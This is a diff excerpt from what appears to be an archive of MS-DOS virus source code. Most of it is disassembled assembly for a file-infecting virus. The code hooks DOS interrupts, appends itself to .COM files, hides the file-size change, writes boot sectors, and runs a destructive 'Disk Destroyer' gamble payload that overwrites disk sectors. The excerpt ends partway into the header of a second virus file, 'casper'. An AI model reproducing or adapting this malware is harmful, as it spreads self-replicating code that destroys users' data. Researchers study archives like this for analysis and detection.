+loc_2: + cmp al,66h ; 'f' + je loc_4 ; Jump if equal + mov al,66h ; 'f' + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx + push ax + push bx + push cx + push dx + push es + mov ah,2Fh ; '/' + int 21h ; DOS Services ah=function 2Fh + ; get DTA ptr into es:bx + mov al,es:[bx+10h] + cmp al,43h ; 'C' + jne loc_3 ; Jump if not equal + mov al,es:[bx+11h] + cmp al,4Fh ; 'O' + jne loc_3 ; Jump if not equal + mov al,es:[bx+12h] + cmp al,4Dh ; 'M' + jne loc_3 ; Jump if not equal + mov ax,es:[bx+24h] + cmp ax,91Ah + jb loc_3 ; Jump if below + sub ax,91Ah + mov cx,ax + push cx + mov cx,10h + mov dx,0 + div cx ; ax,dx rem=dx:ax/reg + pop cx + cmp dx,0 + jne loc_3 ; Jump if not equal + mov es:[bx+24h],cx +loc_3: + pop es + pop dx + pop cx + pop bx + pop ax + iret ; Interrupt return +int_24h_entry endp + +loc_4: + push ax + push bx + push cx + push dx + push si + push di + push bp + push ds + push es + mov bx,cs + mov ds,bx + mov al,0 + mov ds:data_18e,al ; (6AE6:004D=0) + mov al,ds:data_13e ; (6AE6:0040=0) + cmp al,0FFh + jne loc_5 ; Jump if not equal + jmp loc_15 ; (06B2) +loc_5: + mov al,0FFh + mov ds:data_13e,al ; (6AE6:0040=0) + cmp ah,4Bh ; 'K' + je loc_6 ; Jump if equal + cmp ah,36h ; '6' + je loc_7 ; Jump if equal + jmp loc_15 ; (06B2) +loc_6: + mov ah,19h + int 21h ; DOS Services ah=function 19h + ; get default drive al (0=a:) + mov ds:data_12e,al ; (6AE6:003F=0) + jmp short loc_8 ; (0624) + db 90h +loc_7: + mov ah,19h + int 21h ; DOS Services ah=function 19h + ; get default drive al (0=a:) + mov ds:data_12e,al ; (6AE6:003F=0) + cmp dl,0 + je loc_8 ; Jump if equal + dec dl + mov ah,0Eh + int 21h ; DOS Services ah=function 0Eh + ; set default drive dl (0=a:) +loc_8: + mov ah,19h + int 21h ; DOS Services ah=function 19h + ; get default drive al (0=a:) + cmp al,1 + ja loc_9 ; Jump if above + mov ch,0 + push ds + pop es + mov bx,917h + mov al,1 + call sub_3 ; (07DB) + mov al,1 + call sub_4 ; (07EC) + cmp ah,0 + je loc_9 ; Jump if equal + jmp short loc_14 ; (069C) + db 90h +loc_9: + mov ah,2Fh ; '/' + int 21h ; DOS Services ah=function 2Fh + ; get DTA ptr into es:bx + mov ds:data_14e,bx ; (6AE6:0041=0) + mov ds:data_15e,es ; (6AE6:0043=6AE6h) + mov dx,4Eh + mov ah,1Ah + int 21h ; DOS Services ah=function 1Ah + ; set DTA to ds:dx + mov dx,0Bh + mov cx,3Fh + mov ah,4Eh ; 'N' + int 21h ; DOS Services ah=function 4Eh + ; find 1st filenam match @ds:dx + jc loc_14 ; Jump if carry Set + mov dx,6Ch + call sub_1 ; (06EE) + cmp dl,1 + jne loc_10 ; Jump if not equal + call sub_2 ; (073C) + jmp short loc_14 ; (069C) + db 90h +loc_10: + cmp dl,3 + je loc_11 ; Jump if equal + jmp short loc_14 ; (069C) + db 90h +loc_11: + mov ah,4Fh ; 'O' + int 21h ; DOS Services ah=function 4Fh + ; find next filename match + jnc loc_12 ; Jump if carry=0 + jmp short loc_14 ; (069C) + db 90h +loc_12: + mov dx,6Ch + call sub_1 ; (06EE) + cmp dl,1 + jne loc_13 ; Jump if not equal + call sub_2 ; (073C) + jmp short loc_14 ; (069C) + db 90h +loc_13: + cmp dl,3 + je loc_11 ; Jump if equal +loc_14: + mov dl,ds:data_12e ; (6AE6:003F=0) + mov ah,0Eh + int 21h ; DOS Services ah=function 0Eh + ; set default drive dl (0=a:) + mov dx,ds:data_14e ; (6AE6:0041=0) + mov bx,ds:data_15e ; (6AE6:0043=6AE6h) + mov ds,bx + mov ah,1Ah + int 21h ; DOS Services ah=function 1Ah + ; set DTA to ds:dx +loc_15: + mov ah,0 + mov ds:data_13e,ah ; (6AE6:0040=0) + pop es + pop ds + pop bp + pop di + pop si + pop dx + pop cx + pop bx + pop ax +;* jmp far ptr loc_1 ;*(0273:1460) + db 0EAh, 60h, 14h, 73h, 2 + db 8Ch, 0CAh, 83h, 0C2h, 10h, 8Eh + db 0DAh, 0BAh, 20h, 0, 0B4h, 41h + db 0CDh, 21h, 0B8h, 21h, 35h, 0CDh + db 21h, 8Ch, 6, 0D4h, 1, 89h + db 1Eh, 0D2h, 1, 0BAh, 82h, 0 + db 0B8h, 21h, 25h, 0CDh, 21h, 0BAh + db 1Bh, 0Ch, 0CDh + db 27h + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_1 proc near + mov ax,ds:data_19e ; (6AE6:0068=0) + cmp ax,0F5B9h + ja loc_20 ; Jump if above + mov ax,4300h + int 21h ; DOS Services ah=function 43h + ; get/set file attrb, nam@ds:dx + test cl,4 + jnz loc_20 ; Jump if not zero + test cl,1 + jz loc_16 ; Jump if zero + and cl,0FEh + mov ax,4301h + int 21h ; DOS Services ah=function 43h + ; get/set file attrb, nam@ds:dx +loc_16: + mov ax,3D02h + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + mov bx,ax + mov dx,3 + mov cx,1 + mov ah,3Fh ; '?' + int 21h ; DOS Services ah=function 3Fh + ; read file, cx=bytes, to ds:dx + jnc loc_17 ; Jump if carry=0 + jmp short loc_19 ; (0732) + db 90h +loc_17: + cmp ax,0 + jne loc_18 ; Jump if not equal + jmp short loc_19 ; (0732) + db 90h +loc_18: + mov al,byte ptr ds:data_8e+1 ; (6AE6:0003=0) + cmp al,90h + jne loc_21 ; Jump if not equal +loc_19: + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle +loc_20: + mov dl,3 + retn +loc_21: + mov dl,1 + retn +sub_1 endp + + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_2 proc near + mov ax,5700h + int 21h ; DOS Services ah=function 57h + ; get/set file date & time + mov ds:data_20e,dx ; (6AE6:007E=0) + mov ds:data_21e,cx ; (6AE6:0080=0) + push bx + call sub_5 ; (07FD) + mov bx,68h + mov ax,[bx] + mov dx,0 + mov bx,10h + div bx ; ax,dx rem=dx:ax/reg + inc ax + mov ds:data_10e,ax ; (6AE6:003B=0) + mul bx ; dx:ax = reg * ax + mov ds:data_11e,ax ; (6AE6:003D=0) + pop bx + mov cx,ds:data_10e ; (6AE6:003B=0) + mov si,35Fh + mov [si],cx + mov cx,0 + mov dx,0 + mov ax,4200h + int 21h ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset + mov dx,605h + mov cx,4 + mov ah,3Fh ; '?' + int 21h ; DOS Services ah=function 3Fh + ; read file, cx=bytes, to ds:dx + mov cx,0 + mov dx,ds:data_11e ; (6AE6:003D=0) + mov ax,4200h + int 21h ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset + mov dx,0 + mov cx,91Ah + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx + cmp ax,cx + jb loc_22 ; Jump if below + mov al,ds:data_18e ; (6AE6:004D=0) + cmp al,1 + je loc_22 ; Jump if equal + mov cx,0 + mov dx,0 + mov ax,4200h + int 21h ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset + mov si,9 + mov ax,ds:data_11e ; (6AE6:003D=0) + add ax,35Ch + sub ax,4 + mov [si],ax + mov dx,7 + mov cx,4 + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx +loc_22: + mov dx,ds:data_20e ; (6AE6:007E=0) + mov cx,ds:data_21e ; (6AE6:0080=0) + mov ax,5701h + int 21h ; DOS Services ah=function 57h + ; get/set file date & time + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + call sub_6 ; (0813) + retn +sub_2 endp + + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_3 proc near + push ax + mov ah,19h + int 21h ; DOS Services ah=function 19h + ; get default drive al (0=a:) + mov dl,al + pop ax + mov dh,0 + mov cl,1 + mov ah,2 + int 13h ; Disk dl=drive #: ah=func b2h + ; read sectors to memory es:bx + retn +sub_3 endp + + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_4 proc near + push ax + mov ah,19h + int 21h ; DOS Services ah=function 19h + ; get default drive al (0=a:) + mov dl,al + pop ax + mov dh,0 + mov cl,1 + mov ah,3 + int 13h ; Disk dl=drive #: ah=func b3h + ; write sectors from mem es:bx + retn +sub_4 endp + + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_5 proc near + mov ax,3524h + int 21h ; DOS Services ah=function 35h + ; get intrpt vector al in es:bx + mov ds:data_16e,bx ; (6AE6:0045=0) + mov ds:data_17e,es ; (6AE6:0047=6AE6h) + mov dx,335h + mov ax,2524h + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + retn +sub_5 endp + + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_6 proc near + mov dx,ds:data_16e ; (6AE6:0045=0) + mov cx,ds:data_17e ; (6AE6:0047=6AE6h) + push ds + push cx + pop ds + mov ax,2524h + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + pop ds + retn +sub_6 endp + + db 50h, 53h, 51h, 52h, 1Eh, 6 + db 0B4h, 0, 0CDh, 13h, 0B4h, 1 + db 88h, 26h, 4Dh, 0, 0BFh, 0FFh + db 0FFh, 8Eh, 6, 49h, 0, 8Bh + db 1Eh, 4Bh, 0, 0B0h, 0, 26h + db 88h, 7, 7, 1Fh, 5Ah, 59h + db 5Bh, 58h, 0CFh, 8Ch, 0CAh, 0B9h + db 3Fh, 0, 3, 0D1h, 83h, 0C2h + db 10h, 8Eh, 0DAh, 0A1h, 3Dh, 0 + db 5, 3, 6, 0BBh, 0FEh, 0FFh + db 2Bh, 0D8h, 89h, 1Eh, 3, 6 + db 0BBh, 5, 6, 8Ah, 7, 2Eh + db 0A2h, 0, 1, 43h, 8Ah, 7 + db 2Eh, 0A2h, 1, 1, 43h, 8Ah + db 7, 2Eh, 0A2h, 2, 1, 43h + db 8Ah, 7, 2Eh, 0A2h, 3, 1 + db 0B4h, 2Ah, 0CDh, 21h, 80h, 0FAh + db 0Fh, 74h, 3, 0E9h, 0A2h, 1 +loc_23: + cmp dh,1 + je loc_24 ; Jump if equal + cmp dh,4 + je loc_24 ; Jump if equal + cmp dh,8 + je loc_24 ; Jump if equal + jmp loc_36 ; (0A33) +loc_24: + call sub_8 ; (09EB) + push ds + pop es + mov si,613h + mov di,613h + mov cx,305h + cld ; Clear direction + +locloop_25: + lodsb ; String [si] to al + sub al,64h ; 'd' + stosb ; Store al to es:[di] + loop locloop_25 ; Loop if cx > 0 + + mov dx,613h + mov ah,9 + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx +loc_26: + mov ah,7 + int 21h ; DOS Services ah=function 07h + ; get keybd char al, no echo + mov byte ptr ds:data_2e,64h ; (0000:060D=0) 'd' + nop + mov byte ptr ds:data_3e,78h ; (0000:060E=0) 'x' + nop + mov byte ptr ds:data_4e,0B4h ; (0000:060F=0) + nop + mov ah,2Ch ; ',' + int 21h ; DOS Services ah=function 2Ch + ; get time, cx=hrs/min, dh=sec + mov bl,dh + mov bh,0 + mov ch,0 + mov dh,0 + add cl,dl + mov ax,cx + mov cl,3 + div cl ; al, ah rem = ax/reg + mov ds:data_5e,ah ; (0000:0610=0) + mov ax,dx + mov dl,3 + div dl ; al, ah rem = ax/reg + mov ds:data_6e,ah ; (0000:0611=0) + mov ax,bx + div dl ; al, ah rem = ax/reg + mov ds:data_7e,ah ; (0000:0612=0) + dec byte ptr ds:data_1e ; (0000:060C=0) + mov al,ds:data_1e ; (0000:060C=0) + add al,30h ; '0' + mov dh,0Dh + mov dl,26h ; '&' + mov bx,0 + mov ah,2 + int 10h ; Video display ah=functn 02h + ; set cursor location in dx + mov ah,0Eh + int 10h ; Video display ah=functn 0Eh + ; write char al, teletype mode +loc_27: + mov dx,1FFFh +loc_28: + nop + nop + nop + dec dx + jnz loc_28 ; Jump if not zero + mov al,ds:data_2e ; (0000:060D=0) + cmp al,ds:data_5e ; (0000:0610=0) + je loc_29 ; Jump if equal + mov dl,19h + mov al,ds:data_2e ; (0000:060D=0) + call sub_7 ; (09C9) + mov al,ds:data_2e ; (0000:060D=0) + dec al + mov ds:data_2e,al ; (0000:060D=0) +loc_29: + mov al,ds:data_3e ; (0000:060E=0) + cmp al,ds:data_6e ; (0000:0611=0) + je loc_30 ; Jump if equal + mov dl,21h ; '!' + mov al,ds:data_3e ; (0000:060E=0) + call sub_7 ; (09C9) + dec byte ptr ds:data_3e ; (0000:060E=0) +loc_30: + mov al,ds:data_4e ; (0000:060F=0) + cmp al,ds:data_7e ; (0000:0612=0) + je loc_31 ; Jump if equal + mov dl,29h ; ')' + mov al,ds:data_4e ; (0000:060F=0) + call sub_7 ; (09C9) + dec byte ptr ds:data_4e ; (0000:060F=0) +loc_31: + mov al,ds:data_4e ; (0000:060F=0) + cmp al,ds:data_7e ; (0000:0612=0) + jne loc_27 ; Jump if not equal + mov ah,ds:data_3e ; (0000:060E=0) + cmp ah,ds:data_6e ; (0000:0611=0) + jne loc_27 ; Jump if not equal + mov bl,ds:data_2e ; (0000:060D=0) + cmp bl,ds:data_5e ; (0000:0610=0) + jne loc_27 ; Jump if not equal + cmp al,0 + jne loc_32 ; Jump if not equal + cmp ah,0 + jne loc_32 ; Jump if not equal + cmp bl,0 + jne loc_32 ; Jump if not equal + mov dx,80Ah + mov ah,9 + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx + call sub_9 ; (0A18) + jmp short loc_35 ; (09C7) + db 90h +loc_32: + cmp al,1 + jne loc_33 ; Jump if not equal + cmp ah,1 + jne loc_33 ; Jump if not equal + cmp bl,1 + jne loc_33 ; Jump if not equal + mov dx,88Dh + mov ah,9 + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx + jmp short loc_34 ; (09BD) + db 90h +loc_33: + mov al,ds:data_1e ; (0000:060C=0) + cmp al,0 + je loc_34 ; Jump if equal + jmp loc_26 ; (08BF) +loc_34: + mov dx,8D6h + mov ah,9 + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx + jmp short loc_35 ; (09C7) + nop +loc_35: + jmp short loc_35 ; (09C7) + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_7 proc near + mov ah,0 + push ax + mov dh,0Bh + mov ah,2 + mov bh,0 + int 10h ; Video display ah=functn 02h + ; set cursor location in dx + pop ax + mov bl,3 + div bl ; al, ah rem = ax/reg + mov bl,ah + mov bh,0 + add bx,609h + mov al,[bx] + mov ah,0Eh + mov bx,0 + int 10h ; Video display ah=functn 0Eh + ; write char al, teletype mode + retn +sub_7 endp + + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_8 proc near + push ds + mov bx,ds + add bx,1000h + mov ds,bx + mov bx,0 + mov ah,19h + int 21h ; DOS Services ah=function 19h + ; get default drive al (0=a:) + mov cx,50h + mov dx,0 + int 25h ; Absolute disk read, drive al + popf ; Pop flags + mov bx,0 + mov ds,bx + mov ah,19h + int 21h ; DOS Services ah=function 19h + ; get default drive al (0=a:) + mov cx,50h + mov dx,0 + int 26h ; Absolute disk write, drive al + popf ; Pop flags + pop ds + retn +sub_8 endp + + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_9 proc near + push ds + mov bx,ds + add bx,1000h + mov ds,bx + mov bx,0 + mov ah,19h + int 21h ; DOS Services ah=function 19h + ; get default drive al (0=a:) + mov cx,50h + mov dx,0 + int 26h ; Absolute disk write, drive al + popf ; Pop flags + pop ds + retn +sub_9 endp + +loc_36: + mov bx,0 + mov ax,4B59h + int 21h ; DOS Services ah=function 4Bh + ; run progm @ds:dx, parm @es:bx + cmp ax,666h + jne loc_37 ; Jump if not equal + jmp loc_41 ; (0AF0) +loc_37: + push ds + pop es + push ds + push cs + pop ds + mov si,0 + mov di,917h + mov cx,100h + cld ; Clear direction + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + pop ds + mov ah,2Fh ; '/' + int 21h ; DOS Services ah=function 2Fh + ; get DTA ptr into es:bx + mov ds:data_14e,bx ; (6AE6:0041=0) + mov ds:data_15e,es ; (6AE6:0043=6AE6h) + mov dx,4Eh + mov ah,1Ah + int 21h ; DOS Services ah=function 1Ah + ; set DTA to ds:dx + mov dx,11h + mov cx,3Fh + mov ah,4Eh ; 'N' + int 21h ; DOS Services ah=function 4Eh + ; find 1st filenam match @ds:dx + jc loc_38 ; Jump if carry Set + mov dx,11h + call sub_1 ; (06EE) + cmp dl,1 + jne loc_38 ; Jump if not equal + call sub_2 ; (073C) +loc_38: + call sub_5 ; (07FD) + mov dx,20h + mov cx,2 + mov ah,3Ch ; '<' + int 21h ; DOS Services ah=function 3Ch + ; create/truncate file @ ds:dx + jc loc_40 ; Jump if carry Set + mov bx,ax + mov dx,0 + mov cx,91Ah + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx + push ax + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + pop ax + cmp ax,cx + je loc_39 ; Jump if equal + mov dx,20h + mov ah,41h ; 'A' + int 21h ; DOS Services ah=function 41h + ; delete file, name @ ds:dx + jmp short loc_40 ; (0AD1) + db 90h +loc_39: + push cs + pop es + mov bx,cs:data_8e ; (6AE6:0002=0) + sub bx,92Ch + mov cx,cs + sub bx,cx + mov ah,4Ah ; 'J' + int 21h ; DOS Services ah=function 4Ah + ; change mem allocation, bx=siz + mov dx,20h + push ds + pop es + mov bx,2Dh + mov ax,4B00h + int 21h ; DOS Services ah=function 4Bh + ; run progm @ds:dx, parm @es:bx +loc_40: + call sub_6 ; (0813) + push cs + pop es + mov di,0 + mov si,917h + mov cx,0FFh + cld ; Clear direction + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + mov dx,ds:data_14e ; (6AE6:0041=0) + mov bx,ds:data_15e ; (6AE6:0043=6AE6h) + mov ds,bx + mov ah,1Ah + int 21h ; DOS Services ah=function 1Ah + ; set DTA to ds:dx +loc_41: + push cs + pop ds + jmp $-0F32h + jmp $+3DFh + db 48h, 9Bh, 9Ch, 3Fh, 5, 0Ah + db 5, 3, 1, 3, 0, 6Eh + db 71h, 6Dh, 6Dh, 84h, 84h, 84h + db 0A8h, 0ADh, 0B7h, 0AFh, 84h, 0A8h + db 0A9h, 0B7h, 0B8h, 0B6h, 0B3h, 0BDh + db 0A9h, 0B6h, 84h, 5Dh, 84h, 0A5h + db 84h, 0B7h, 0B3h, 0B9h, 0BAh, 0A9h + db 0B2h, 0ADh, 0B6h, 84h, 0B3h, 0AAh + db 84h, 0B1h, 0A5h, 0B0h, 0B8h, 0A5h + db 6Eh, 71h, 6Eh, 71h, 6Dh, 6Dh + db 0ADh, 84h, 0CCh, 0C5h, 0DAh, 0C9h + db 84h, 0CEh, 0D9h, 0D7h, 0D8h, 84h + db 0A8h, 0A9h, 0B7h, 0B8h, 0B6h, 0B3h + db 0BDh, 0A9h, 0A8h, 84h, 0D8h, 0CCh + db 0C9h, 84h, 0AAh, 0A5h, 0B8h, 84h + db 0D3h, 0D2h, 84h, 0DDh, 0D3h, 0D9h + db 0D6h, 84h, 0A8h, 0CDh, 0D7h, 0CFh + db 84h, 85h, 85h, 6Eh, 71h, 84h + db 84h, 84h, 84h, 84h, 84h, 0ACh + db 0D3h, 0DBh, 0C9h, 0DAh, 0C9h, 0D6h + db 90h, 84h, 0ADh, 84h, 0CCh, 0C5h + db 0DAh, 0C9h, 84h, 0C5h, 84h, 0C7h + db 0D3h, 0D4h, 0DDh, 84h, 0CDh, 0D2h + db 84h, 0B6h, 0A5h, 0B1h, 90h, 84h + db 0C5h, 0D2h, 0C8h, 84h, 0ADh, 0C4h + db 0D1h, 84h, 0CBh, 0CDh, 0DAh, 0CDh + db 0D2h, 0CBh, 84h, 0DDh, 0D3h, 0D9h + db 84h, 0C5h, 84h, 0D0h, 0C5h, 0D7h + db 0D8h, 84h, 0C7h, 0CCh, 0C5h, 0D2h + db 0C7h, 0C9h, 6Eh, 71h, 6Dh, 6Dh + db 6Dh, 0D8h, 0D3h, 84h, 0D6h, 0C9h + db 0D7h, 0D8h, 0D3h, 0D6h, 0C9h, 84h + db 0DDh, 0D3h, 0D9h, 0D6h, 84h, 0D4h + db 0D6h, 0C9h, 0C7h, 0CDh, 0D3h, 0D9h + db 0D7h, 84h, 0C8h, 0C5h, 0D8h, 0C5h + db 92h, 6Eh, 71h, 84h, 84h, 84h + db 84h, 84h, 0BBh, 0A5h, 0B6h, 0B2h + db 0ADh, 0B2h, 0ABh, 9Eh, 84h, 0ADh + db 0AAh, 84h, 0BDh, 0B3h, 0B9h, 84h + db 0B6h, 0A9h, 0B7h, 0A9h, 0B8h, 84h + db 0B2h, 0B3h, 0BBh, 90h, 84h, 0A5h + db 0B0h, 0B0h, 84h, 0BDh, 0B3h, 0B9h + db 0B6h, 84h, 0A8h, 0A5h, 0B8h, 0A5h + db 84h, 0BBh, 0ADh, 0B0h, 0B0h, 84h + db 0A6h, 0A9h, 84h, 0B0h, 0B3h, 0B7h + db 0B8h, 84h, 91h, 84h, 0AAh, 0B3h + db 0B6h, 0A9h, 0BAh, 0A9h, 0B6h, 84h + db 85h, 85h, 6Eh, 71h, 6Dh, 6Dh + db 84h, 84h, 84h, 0BDh, 0D3h, 0D9h + db 0D6h, 84h, 0A8h, 0C5h, 0D8h, 0C5h + db 84h, 0C8h, 0C9h, 0D4h, 0C9h, 0D2h + db 0C8h, 0D7h, 84h, 0D3h, 0D2h, 84h + db 0C5h, 84h, 0CBh, 0C5h, 0D1h, 0C9h + db 84h, 0D3h, 0CAh, 84h, 0AEh, 0A5h + db 0A7h, 0AFh, 0B4h, 0B3h, 0B8h, 71h + db 6Eh, 71h, 6Eh, 6Dh, 6Dh, 84h + db 84h, 84h, 84h, 84h, 84h, 0A7h + db 0A5h, 0B7h, 0ADh, 0B2h, 0B3h, 84h + db 0A8h, 0A9h, 84h, 0B1h, 0A5h, 0B0h + db 0B8h, 0A9h, 84h, 0AEh, 0A5h, 0A7h + db 0AFh, 0B4h, 0B3h, 0B8h + db 'nqnqmmm-1' + db 1Fh, 6Dh, 2Dh, 31h, 1Fh, 6Dh + db 2Dh, 31h, 1Fh, 6Eh, 71h, 6Dh + db 6Dh, 6Dh, 3Bh, 0, 3Bh, 6Dh + db 3Bh, 0A3h, 3Bh, 6Dh, 3Bh, 0FFh + db ';nqmmm,1 m,1 m,1 nqmmm' + db 84h, 84h, 84h, 84h, 0A7h, 0B6h + db 0A9h, 0A8h, 0ADh, 0B8h, 0B7h, 84h + db 9Eh, 84h, 99h + db 'nqqnqnmmm' + db 0, 0, 0, 84h, 0A1h, 84h + db 0BDh, 0D3h, 0D9h, 0D6h, 84h, 0A8h + db 0CDh, 0D7h, 0CFh, 6Eh, 71h, 6Dh + db 6Dh, 6Dh, 0A3h, 0A3h, 0A3h, 84h + db 0A1h, 84h, 0B1h, 0DDh, 84h, 0B4h + db 0CCh, 0D3h, 0D2h, 0C9h, 84h, 0B2h + db 0D3h, 92h, 6Eh, 71h, 6Eh, 71h + db 6Dh, 6Dh, 6Dh, 0A5h, 0B2h, 0BDh + db 84h, 0AFh, 0A9h, 0BDh, 84h, 0B8h + db 0B3h, 84h, 0B4h, 0B0h, 0A5h, 0BDh + db 'qnqnqnqnqn' + db 88h, 6Eh, 71h, 0A6h, 0A5h, 0B7h + db 0B8h, 0A5h, 0B6h, 0A8h, 84h, 85h + db 84h, 0BDh, 0D3h, 0D9h, 0C4h, 0D6h + db 0C9h, 84h, 0D0h, 0D9h, 0C7h, 0CFh + db 0DDh, 84h, 0D8h, 0CCh, 0CDh, 0D7h + db 84h, 0D8h, 0CDh, 0D1h, 0C9h, 84h + db 91h, 84h, 0C6h, 0D9h, 0D8h, 84h + db 0CAh, 0D3h, 0D6h, 84h, 0DDh, 0D3h + db 0D9h, 0D6h, 84h, 0D3h, 0DBh, 0D2h + db 84h, 0D7h, 0C5h, 0CFh, 0C9h, 90h + db 84h, 0D2h, 0D3h, 0DBh, 6Eh, 71h + db 0B7h, 0BBh, 0ADh, 0B8h, 0A7h, 0ACh + db 84h, 0B3h, 0AAh, 0AAh, 84h, 0BDh + db 0B3h, 0B9h, 0B6h, 84h, 0A7h, 0B3h + db 0B1h, 0B4h, 0B9h, 0B8h, 0A9h, 0B6h + db 84h, 0A5h, 0B2h, 0A8h, 84h, 0A8h + db 0B3h, 0B2h, 0C4h, 0B8h, 84h, 0B8h + db 0B9h, 0B6h +loc_42: + mov dl,84h + lodsw ; String [si] to ax + mov ax,0B384h + mov dl,84h + mov ax,0B0ADh + mov al,84h + mov ax,0B1B3h + mov bl,0B6h + mov dh,0B3h + mov bx,8584h + test ax,ds:data_33e[di] ; (6AE6:716E=0) + mov [bp+71h],ch + mov dl,0D3h + test ch,[bp+si-3827h] + iret ; Interrupt return + db 0CDh, 0D2h, 0C4h, 84h, 0A7h, 0CCh + db 0C5h, 0D2h, 0C7h, 0C9h, 9Fh, 84h + db 0C5h, 0D2h, 0C8h, 84h, 0ADh, 0C4h + db 0D1h, 84h, 0D4h, 0D9h, 0D2h, 0CDh + db 0D7h, 0CCh, 0CDh, 0D2h, 0CBh, 84h + db 0DDh, 0D3h, 0D9h, 84h, 0CAh, 0D3h + db 0D6h, 84h, 0D8h, 0D6h, 0DDh, 0CDh + db 0D2h, 0CBh, 84h, 0D8h, 0D3h, 84h + db 0D8h, 0D6h, 0C5h, 0C7h, 0C9h, 84h + db 0D1h, 0C9h, 84h, 0C8h, 0D3h, 0DBh + db 0D2h, 84h, 85h, 88h, 6Eh, 71h + db 0ACh, 0A5h, 84h, 0ACh, 0A5h, 84h + db 85h, 85h, 84h, 0BDh, 0D3h, 0D9h + db 84h, 0C5h, 0D7h, 0D7h, 0CCh, 0D3h + db 0D0h, 0C9h, 90h, 84h, 0DDh, 0D3h + db 0D9h, 0C4h, 0DAh, 0C9h, 84h, 0D0h + db 0D3h, 0D7h, 0D8h, 9Eh, 84h, 0D7h + db 0C5h, 0DDh, 84h, 0A6h, 0DDh, 0C9h + db 84h, 0D8h, 0D3h, 84h, 0DDh, 0D3h + db 0D9h, 0D6h, 84h, 0A6h, 0C5h, 0D0h + db 0D0h, 0D7h, 84h, 92h, 92h, 92h + db 6Eh, 71h, 88h, 0CDh, 20h, 0 + +seg_a ends + + + + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.casper.asm b/MSDOS/Virus.MSDOS.Unknown.casper.asm new file mode 100644 index 00000000..e157a0b1 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.casper.asm @@ -0,0 +1,776 @@ +; +; +; Copyright (C) Mark Washburn, 1990. All Rights Reserved +; +; +; Inquires are directed to : +; Mark Washburn +; 4656 Polk Street NE +; Columbia Heights, MN 55421 +; USA +; +; +; +; +code segment public 'CODE' + org 100h +; + assume cs:code,ds:code,es:code +; + +;stopdebug equ 1 ; define this for disassembly trap code +int1vec equ 4 +int3vec equ 12 +; +dta_ptr equ -4 +file_crea equ -8 +file_attr equ -10 +path_start_ptr equ -12 +file_start_ptr equ -14 